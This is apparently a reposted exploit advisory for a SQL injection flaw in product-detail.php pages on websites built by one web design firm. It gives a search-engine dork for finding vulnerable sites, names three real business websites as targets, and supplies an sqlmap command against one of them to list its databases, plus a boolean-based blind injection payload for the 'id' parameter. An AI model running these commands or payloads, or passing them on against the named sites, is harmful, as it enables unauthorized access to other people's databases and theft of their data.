WEBSITE DEVELOPED BY: A R INFOTECH SQL injection Tested in BackBox GNU/Linux


Information Exploit

[+] Exploit Title : WEBSITE DEVELOPED BY: A R INFOTECH
[+] Author : Mikayil Ilyas / CYBER-WARRIOR.ORG / AKINCILAR
[+] Vendor Home: http://www.arinfotech.co.in/
[+] Dork : inurl:product-detail.php?id= intext:"WEBSITE DEVELOPED BY: A R INFOTECH"
[+] Tested on : BackBox 5.1, Chrome

On Target :
- https://www.jindalgemsjaipur.com/product-detail.php?id=173&catid=571&subid=573&spcatid=597
- http://www.channiexports.com/product-detail.php?id=191&catid=4&subid=16&spcatid=0
- http://bkgems.net/product-detail.php?id=106&catid=24&subid=0&spcatid=0

vulnerability site


[+] Poc SQLmap :
- sqlmap -u "https://www.jindalgemsjaipur.com/product-detail.php
id=173&catid=571&subid=573&spcatid=597" --dbs

[+] Poc SQL :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=173' AND 5309=5309 AND 'eCye'='eCye&catid=571&subid=573&spcatid=597


Video tutorial


Sumber Exploit : [cxsecurity.com]
Previous
Next Post »